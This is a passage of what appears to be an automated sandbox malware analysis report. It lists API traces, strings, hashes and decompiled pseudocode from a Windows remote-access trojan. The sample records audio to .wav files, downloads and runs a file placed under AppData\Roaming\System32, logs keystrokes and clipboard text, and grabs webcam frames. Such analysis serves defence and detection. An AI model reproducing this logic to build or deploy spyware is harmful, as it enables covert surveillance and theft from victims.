                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                          • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                        • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                        • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                        • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                        • String ID: %Y-%m-%d %H.%M$.wav
                                        • API String ID: 4079669728-3597965672
                                        • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                        • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                        • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                        • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                        • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                        • free.MSVCRT(?,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,?), ref: 0040D643
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        • C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, xrefs: 0040D636
                                        • open, xrefs: 0040D5BA
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                        • String ID: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$open
                                        • API String ID: 2294739476-1846506323
                                        • Opcode ID: 409004fbd4d77830aa8a5ec4fe989b6473c89031e6c1a4ce514544c42b28889c
                                        • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                        • Opcode Fuzzy Hash: 409004fbd4d77830aa8a5ec4fe989b6473c89031e6c1a4ce514544c42b28889c
                                        • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,745E73F0,?), ref: 0040697B
                                        • toupper.MSVCRT ref: 0040698A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                        • toupper.MSVCRT ref: 00406A61
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                          • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                          • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 004069D7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A01
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A0B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A1D
                                        • tolower.MSVCRT ref: 00406A3A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                        Strings
                                        • [Ctrl + , xrefs: 00406996
                                        • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                        • [End of clipboard text], xrefs: 004069EC
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                        • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                        • API String ID: 1567161615-398269065
                                        • Opcode ID: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                        • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                        • Opcode Fuzzy Hash: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                        • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6F5E5DF0), ref: 0041016E
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                        • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                          • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                          • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                          • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                        • String ID:
                                        • API String ID: 1196022968-0
                                        • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                        • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                        • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                        • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                        				char _v20;
                                        				char _v36;
                                        				void* __ebp;
                                        				void* _t22;
                                        				void* _t23;
                                        				void* _t32;
                                        				char* _t33;
                                        				void* _t36;
                                        				void* _t38;
                                        				signed char _t39;
                                        				signed char _t41;
                                        				char* _t42;
                                        				int _t43;
                                        				intOrPtr _t65;
                                        				signed char _t66;
                                        				void* _t68;
                                        				intOrPtr* _t71;
                                        
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t65 =  *__eax;
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(__eflags,  &_v20,  &_v36,  &E0041B310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t71 = _t68 + 0x24;
                                        				_t22 = _t65 - 0x3c;
                                        				if(_t22 == 0) {
                                        					_t23 = E0040180C( &_v20, __eflags, 0);
                                        					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					_t66 = E00406DD9(_t23);
                                        					__eflags = _t66;
                                        					if(_t66 != 0) {
                                        						 *0x41b2ec = E00407033(_t66, "OpenCamera");
                                        						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
                                        						 *0x41b2f4 = E00407033(_t66, "GetFrame");
                                        						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
                                        						 *0x41b2e8 = 1;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                        						_push(0x1b);
                                        						goto L15;
                                        					}
                                        				} else {
                                        					_t32 = _t22 - 1;
                                        					if(_t32 == 0) {
                                        						__eflags =  *0x41b2e9;
                                        						if(__eflags != 0) {
                                        							goto L8;
                                        						}
                                        					} else {
                                        						_t36 = _t32 - 1;
                                        						if(_t36 == 0) {
                                        							 *0x41b2f0();
                                        							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
                                        						} else {
                                        							_t38 = _t36 - 1;
                                        							if(_t38 == 0) {
                                        								_t39 =  *0x41b2ec();
                                        								__eflags = _t39;
                                        								 *0x41b2e9 = _t39;
                                        								if(__eflags == 0) {
                                        									goto L9;
                                        								} else {
                                        									L8:
                                        									_t33 = E0040180C( &_v20, __eflags, 0);
                                        									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        									_push(atoi(_t33));
                                        									_push(_a4);
                                        									E00401EA2(__eflags);
                                        								}
                                        							} else {
                                        								if(_t38 == 1) {
                                        									_t41 =  *0x41b2ec();
                                        									_t81 = _t41;
                                        									 *0x41b2e9 = _t41;
                                        									if(_t41 == 0) {
                                        										L9:
                                        										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                        										_push(0x41);
                                        										L15:
                                        										E004020C2(_a4);
                                        									} else {
                                        										_t42 = E0040180C( &_v20, _t81, 0);
                                        										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        										_t43 = atoi(_t42);
                                        										 *_t71 = 0x3e8;
                                        										Sleep(??);
                                        										E00401EA2(_t81);
                                        										 *0x41b2f0(_a4, _t43);
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				E004017DD( &_v20);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 00401CF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 00401D01
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                        • atoi.MSVCRT ref: 00401D67
                                        • Sleep.KERNEL32 ref: 00401D76
                                          • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                          • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                          • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(Function_0001B310,?,Function_0001B310,0041B290), ref: 00401F05
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                        • atoi.MSVCRT ref: 00401DB4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                        • API String ID: 3050406488-3547787478
                                        • Opcode ID: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                        • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                        • Opcode Fuzzy Hash: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                        • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 33%
                                        			E00405DD3(void* __ecx, char _a4) {
                                        				struct _SYSTEMTIME _v20;
                                        				char _v36;
                                        				char _v52;
                                        				char* _t24;
                                        				char* _t25;
                                        				char* _t33;
                                        				int _t34;
                                        				void* _t46;
                                        				void* _t47;
                                        
                                        				_t47 = __ecx;
                                        				GetLocalTime( &_v20);
                                        				_t24 =  &_v52;
                                        				L00414176();
                                        				_t25 =  &_v36;
                                        				L00414170();
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
